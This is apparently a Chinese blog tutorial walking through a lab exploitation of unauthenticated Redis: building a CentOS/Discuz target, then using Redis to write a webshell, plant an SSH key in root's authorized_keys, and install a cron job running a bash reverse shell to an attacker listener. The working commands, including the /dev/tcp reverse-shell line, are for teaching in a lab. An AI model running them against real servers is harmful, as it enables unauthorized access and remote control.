Redis漏洞利用与SSH免密反弹Shell

原创 已于 2025-02-11 16:42:29 修改 · 1.4k 阅读 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
cknow-ai 美丽人深

cknow-ai 关注

标签
#redis #ssh
分类 操作系统
于 2025-02-07 17:28:58 首次发布

        本文详细介绍利用 Redis 服务漏洞写入 WebShell ,通过 SSH 公钥实现免密登录,并利用计划任务反弹 Shell 的过程。

 一、靶场搭建

        环境简介

Centos-1:192.168.159.145

Centos-2:192.168.159.137

靶场:discuz

1、Centos2搭建discuz与redis

         Discuz搭建

        首先在centos-2:192.168.159.137服务器上搭建apache服务器

yum install -y httpd httpd-devel

service httpd.service start //开启apache服务

service httpd.service status//查看apache状态

        如下图状态显示为active则表明apache服务器搭建成功。

yum -y install mariadb mariadb-server mariadb-libs mariadb-devel //安装mariadb数据库及其组件

service mariadb.service start //启动mariadb服务

service mariadb.service status //查看状态

netstat -an //查看端口

        安装php,将php和mysql关联起来

yum install -y php yum -y install php-mysql

        将下载的discuz安装包放到/var/www/html下

chown apache:apache -R upload/ //赋予所属组

chmod -R 777 upload/ //赋予可读可写可执行权限

service httpd.service restart //这里如果已经安装了httpd就重启一下服务就好

service mariadb.service restart //同上

service firewalld stop //关闭防火墙

        然后在浏览器中打开http://192.168.159.137/upload/install出现discuz靶场的安装向导,点击同意进行安装。

        这里初始如下图都是不可写,需要修改/etc/selinux/config,修改完重启虚拟机,reboot 重启完成后开启apache服务和mariadb服务,再次访问就是可写。

        修改/etc/selinux/config

vim /etc/selinux/config

 

       reboot 重启,再重启下http服务和mariadb服务:

service httpd.service restart //重启下http服务

service mariadb.service restart //重启mariadb服务

service firewalld stop //关闭防火墙

        再次访问就是可写

        点击下一步继续安装

         数据库密码设置为空,因为我们没有设置密码,管理员密码任意

        数据库搭建完成后,出现以下界面表示discuz靶场安装完成:

        redis搭建

        1、下载redis包 解压进入redis目录

        2、make编译

        3、然后编译完成进入/src目录

        将redis-cli redis-server复制到/usr/local/bin目录下,如此可以在任意目录下运行redis服务

        Make时发生错误1:

解决方案为:yum -y install gcc gcc-c++

        错误2:

解决方案为: make MALLOC=libc

        以上两个错误解决后仍有一些问题,查询后得知版本不兼容,因此重新下载redis其他版本

        更换redis版本为5.0.8,重新编译,成功!

        切换到src目录下,将redis-cli redis-server复制到/usr/local/bin目录下,如此可以在任意目录下运行redis服务。

cp redis-server /usr/local/bin

cp redis-cli /usr/local/bin

        执行redis-server,出现以下界面说明服务启动成功,重新开一个终端进行连接,执行redis-cli ,出现第二张图示例说明搭建成功。

        2、Centos1搭建redis

                 只需要安装下redis服务,重复以上操作即可。

二、利用 Redis 写入Webshell

        开启服务 redis-server

        redis-cli -h 192.168.159.137

        利用redis写入webshell

         访问成功写入

三、利用 Redis 写入 SSH 公钥进行登录

        kali 192.168.159.135 

        靶机 192.168.159.137 

        kali安装redis,使用上面的redis安装包,解压后直接编译就行,编译命令:make

        接着将 /src 目录下的 redis-server 和 redis-cli 复制到 /usr/local/bin 下即可。

        首先在攻击机的/root/.ssh目录里生成ssh公钥key:

ssh-keygen -t rsa

        选项全部默认即可

        接着将公钥导入key.txt文件(前后用\n换行,避免和Redis里其他缓存数据混合)

(echo -e "\n\n"; cat /root/.ssh/id_rsa.pub; echo -e "\n\n") > /root/.ssh/key.txt       

         将key.txt文件内容写入服务端Redis的缓冲里:

cat /root/.ssh/key.txt | redis-cli -h 192.168.159.137 -x set xxx

        

        使用攻击机连接目标机器Redis,设置Redis的备份路径为/root/.ssh/和保存文件名为authorized\_keys,并将数据保存在目标服务器硬盘上。

        但是执行的时候,发现报错,提示没有这样的文件或目录。原因是centos(192.168.159.137)没有启动过ssh,所以没有那个目录,使用命令: ssh localhost即可。

redis-cli -h 192.168.159.137 

config set dir /root/.ssh

config set dbfilename authorized_keys save

   

      ssh 成功实现公钥登录

四、 利用 Redis 写入计划任务反弹shell

        首先在攻击机kali上开启监听:

 nc -lvp 2333

 

        然后连接服务端的Redis,写入反弹shell的计划任务:

redis-cli -h 192.168.159.137

set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/192.168.159.135/2333 0>&1\n\n"

config set dir /var/spool/cron/crontabs/

config set dbfilename root

save

  

        通过计划任务,成功反弹shell

         靶机上也看到存在计划任务

        使用 crontab -r删除计划任务

        crontab -l 查看计划任务

点赞 点赞 26
评论 0
书签 书签 46
网络安全——redis未授权访问漏洞写入计划任务反弹shell
Demo不是emo的博客
09-17 6212
redis的未授权访问漏洞,顾名思义,就是不需要输入账就可以直接登录(含redis服务安装包分享),本文介绍了怎么利用漏洞获取目标shell
Redis未授权访问漏洞详解(全面)
m0_64481831的博客
02-26 4868
Redis是一款内存高速缓存的数据库,是一款K-V型数据库,它的所有键值都是用字典来存储的。其中它的value支持多种数据类型,包括String、List、Set、Zset和Hash。Redis默认情况下绑定在127.0.0.1:6379,在没有进行采用相关的策略,如添加防火墙规则避其他非信任来源ip访问,就会将Redis服务暴露在公网上;并且Redis默认情况是空码连接在服务器以root身份运行Redis时这将导致任意用户可以访问目标服务器下未授权访问Redis以及读取Redis数据。
Pygubu表单验证数据绑定:构建健壮应用的关键步骤
最新发布
gitblog_00746的博客
04-25 918
Pygubu是一个专为Python Tkinter模块设计的简单GUI构建器,它提供了强大的表单验证数据绑定功能,帮助开发者轻松创建健壮的桌面应用程序。本文将详细介绍如何利用Pygubu的表单验证和数据绑定特性,提升应用的可靠性和用户体验。 ## 为什么表单验证数据绑定至关重要 在开发桌面应用时,确保用户输入的数据准确有效是至关重要的。无效的输入可能导致程序崩溃、数据损坏或安全漏洞。Pyg
Redis-钥登录ssh
weixin_54227009的博客
06-06 2210
1、在kali上生成钥命令:ssh-keygen -t rsa因为我这里有了,所以y选择了覆盖如果是想无码登录的话,则直接enter跳过2、 因为我这里config set dir /root/.sshdir有问题,所以我直接就把生成的钥放目标靶机的/root/.ssh/authorized_key文件下了原操作应该是:(echo -e "\n\n"; cat id_rsa.pub;echo -e "\n\n")>key.txt防止乱码,将公钥写入key.txt中将key.txt导入进目标机器cat
SSRF——手把手教你Redis反弹Shell
sudu2020dd的博客
06-04 4613
由于业务运行的服务器处于内外网边界,并且可通过利用当前的这台服务器,根据所在的网络,访问到外部网络隔离的内网应用,所以一般情况下,SSRF漏洞的攻击目标是攻击者无法直接访问的内网系统。因为攻击Redis A之前,首先需要构造一个样本,如何构造,通过在kali本地搭建一个Redis B,作为本地测试,形成攻击链后将他的格式转换为gopher协议,然后测试完毕后,应用在真实攻击上,将gopher协议数据包发送给存在SSRF漏洞的机器实现攻击,转给Redis A,写一个计划任务,反弹shell,往kali弹。
从0到1浅析Redis服务器反弹Shell那些事
道阻且长,行则将至
12-29 3948
本文学习了 Redis 服务的作用,并本地搭建了 Redis 服务,同时介绍了其相关基础使用方法和核心安全配置。然后总结分析了 Redis 未授权访问漏洞或弱口令导致 Redis 服务被攻击者操控后,如何进一步通过反弹 Shell 接管服务器。
Redis反弹Shell
fristchoice的博客
07-28 2305
摘要:本文总结了Redis反弹Shell的六种方法:1)写WebShell到网站目录;2)利用crontab计划任务;3)SSRF结合Redis未授权写Shell;4)写入SSH钥登录;5)利用主从复制RCE漏洞;6)修改系统配置文件。其中重点介绍了前四种方法的实现条件和具体操作步骤,包括关键Redis命令和工具使用。这些方法均需满足特定权限条件,如root启动、未授权访问等,并提供了相关工具链接和参考文章。最后作者表示将持续补充完善,欢迎讨论。
web渗透测试之(未授权访问漏洞redis)反弹shell SSRF结合redis结合伪协议(已更新)
盾悟
02-12 7548
http:// 主要用于探测主机存活和端口的开放情况dict:// 字典服务器协议,访问字典资源,如,dict:///ip:6739/info1探测信息有时候返回的信息比较多2发送指令3运行指令sftp://SSH文件传输协议或安全文件传输协议探测文件时上传下载的 ftp针对21端口gopher:// 分布式文档传递服务,可使用gopherus生成payloadssh基于gopher发起攻击file:/// 从文。
Redis漏洞大全~讲解最全的漏洞利用方法
weixin_67832625的博客
08-11 3654
Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivota赞助。漏洞原理。
redis 未授权访问配合计划任务反弹shell
m0_65096687的博客
05-23 1917
(1)redis绑定在 0.0.0.0:6379,且没有进行添加防火墙规则避其他非信任来源ip访问等相关安全策略,直接暴露在公网;(2)没有设置码认证(一般为空),可以码远程登录redis服务。然后直接本地开个nc。
redis未授权写入ssh公钥登录
m0_46576302的博客
09-09 6370
利用redis的备份功能,写入ssh公钥
六、利用redis写webshell
dahege666的博客
03-02 1091
一、测试环境 靶机 centos7 192.168.1.27 攻击机 kali 192.168.1.138 二、测试过程 服务器配置phpstudy ,截图略过 1. 下载Phpstudy for Linux的bin文件 操作命令: wget -c http://lamp.phpstudy.net/phpstudy.bin 2. 配置phpstudy.bin文件的可执...
血的教训---入侵redis并远程控制你的机器场景复现
guijianchouxyz的博客
10-26 7293
不怕服务安装部署,就怕上任运维瞎部署防不胜防,全是泪,全是血
Redis未授权访问利用
LiuSiXian的博客
07-14 1340
Redis服务器:192.168.100.10攻击机:192.168.15.101。
redis未授权访问--拿webshell以及实现ssh登录
不积跬步无以至千里,不积小流无以成江海
08-30 1133
redis是一个非常快速的,开源的、支持网络、可基于内存亦可持久化的日志型、非关系类型的数据库;提供多种语言的 API,java/c/c++/c#/php/javascript/
redis计划任务反弹shell
干铮的博客
01-31 3419
1.环境搭建 Ubuntu16.04安装redis sudo apt-get install redis-server vim /etc/redis/redis.conf 注释掉码和仅允许本地访问 kali 安装redis-cli进行连接 wget http://download.redis.io/redis-stable.tar.gz tar -zxvf redis-stable.tar.gz cd redis-stable make //全局生效 cp src/redis
攻击Redis
mole_exp的博客
05-10 3022
文章目录通过写文件getshell通过主从复制getshell参考 通过写文件getshell 通过主从复制getshell 参考 [1] https://paper.seebug.org/975/ [2] https://mp.weixin.qq.com/s?__biz=MjM5Njc1OTYyNA==&mid=2450775177&idx=1&sn=60f333eab252e78452f93c129c566939&scene=21#wechat_redirect [3]
linux7安装redis7.2.3以及使用ssh方式远程连接redis教程
12-11 1447
9.使用redis desktop manager工具以ssh方式远程连接redis。4.复制redis.conf配置文件到安装目录并修改为以后端模式启动。2. 上传到linux服并解压。5.启动redis并查看进程。6.客户端访问redis。3.编译并设置安装目录。
五、利用redis计划任务反弹shell
dahege666的博客
03-02 2628
一、测试环境 靶机 centos7 192.168.1.27 攻击机 kali 192.168.1.138 二、测试过程 1.先用kali监听接收shell的端口: 2.连接redis,创建一个key x,值为反弹shell语句,修改备份目录为linux计划任务目录,修改备份文件名为 root,以root身体执行计划任务 3.执行完后回到监听终端页面,但是反弹的...
Redis未授权访问之反弹shell
Zlirving_的博客
06-17 2477
Redis简介 Redis 是一个高性能的key-value数据库。为了保证效率,数据都是缓存在内存中。redis会周期性的把更新的数据写入磁盘或者把修改操作写入追加的记录文件,并且在此基础上实现了master-slave(主从)同步   漏洞简介 1、什么是redis未授权访问漏洞 Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置码认证,会导致任意
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值